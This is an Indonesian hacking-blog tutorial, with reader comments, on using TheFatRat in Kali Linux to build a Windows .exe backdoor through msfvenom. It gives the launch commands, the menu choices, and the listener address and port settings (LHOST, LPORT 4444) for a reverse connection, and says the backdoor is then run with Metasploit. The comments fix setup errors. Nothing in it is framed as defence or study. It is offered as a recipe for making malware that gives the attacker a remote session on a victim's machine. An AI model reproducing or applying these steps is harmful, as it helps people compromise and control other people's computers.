Cara Membuat Backdoor windows.exe dengan TheFatRat di Kali Linux


hello guys kali ini Mr.gagaltotal666 akan berbagi
cara membuat Backdoor windows.exe dengan TheFatRat
tools yang baru kemarin saya bahas [TheFatRat]

tertarik ? oke ikuti langkah berikut

pertama buka terminal kalian dan buka TheFatRat nya :

" $ cd Desktop " >> file TheFatRat saya berada di Desktop

" $ cd TheFatRat "

" $ ./fatrat "

" $ Screetsec@Fatrat > 1 "   >> kita pilih nomer 1


kenapa nomer 1 ? karena disitu terdapat "Create Backdoor With Msfvenom"
yang arti nya kita membuat backdoor dengan Msfvenom
jika kalian pilih nomer 1 akan muncul nya tampilan seperti ini :


selanjut nya kita pilih nomer 2, kenapa ?
karena kita akan membuat Backdoor windows.exe
yang nanti nya untuk os windows

" $ Creator$Fatrat > 2 "

nanti kita akan disuruh masukan IP dan Port
masukan IP kalian masing-masing jika sudah terhubung internet
buat Port bebas > biasa nya Default itu 443 dan 4444
saya disini menggunakan Port 4444

" $ set Lhost 192.168.43.59 "

" $ set Lport 4444 "

tunggu beberapa menit backdoor tersave dan akan muncul bacaan

" do you want exit ? " yes > disini saya pilih yes


sebenarnya kalian pilih no juga gapapa karena itu
cuma perintah untuk keluar dari "Creator$fatrat"
backdoor yang kita buat tadi berada pada file
di ThefatRat nya dan ada di folder Output


dan gimana cara menjalankan si backdoor ini ?
gampang kok kalian jalankan pake si Metasploit ^_^

sekian tips nya dari saya ^_^ semoga bermanfaat

akan saya lanjut hari berikutnya cara menjalankan backdoor TheFatRat ^_^

NB : YANG PLAGIAT MUSNAH !!

Post a Comment

6 Comments

  1. numpang nanya min saya sudah masuk ke ./fatrat tapi muncul ini:
    -- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia
    -- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- --

    [!]::[Check Dependencies]:
    [✔]::[Check User]: root
    [✔]::[Internet Connection]: DONE!
    [x]::[warning]: This Script Needs An Active Internet Connection
    [✔]::[apache2 Server Kali ]: installation found!
    [✔]::[msfconsole]: installation found!
    [✔]::[msfvenom]: installation found!
    [✔]::[Zenity]: installation found!
    [x]::[warning]:this script require mingw32 installed to work

    [!]::[please wait]: please run setup.sh ....
    trus saya harus apa?

    ReplyDelete
    Replies
    1. maaf sekali saya jarang aktif dan tidak melihat komentar
      oke akan saya balas
      agan kalau pakai kali linux tinggal install saja
      mingw32 nya
      sudo apt-get install mingw32
      kalau error pastikan repo agan ambil dari webremi kali atau agan ambil repo kambing.ui ^_^
      maaf sebelum nya saya telat balas ^_^ mohon maaf

      Delete
  2. jalanin pake metasploit pake multi handler bisa?

    ReplyDelete
  3. kok saya keluar "bash: ./fatrat: Permission denied" mulu ?

    ReplyDelete
    Replies
    1. mohon maaf baru bales, coba kamu kasih hak akses menggunakan
      chmod +x fatrat

      pelajari installasi disini
      https://gagaltotal666.blogspot.co.id/2016/07/thefatrat-mempermudah-backdoor-dengan.html

      Delete
Emoji
(y)
:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)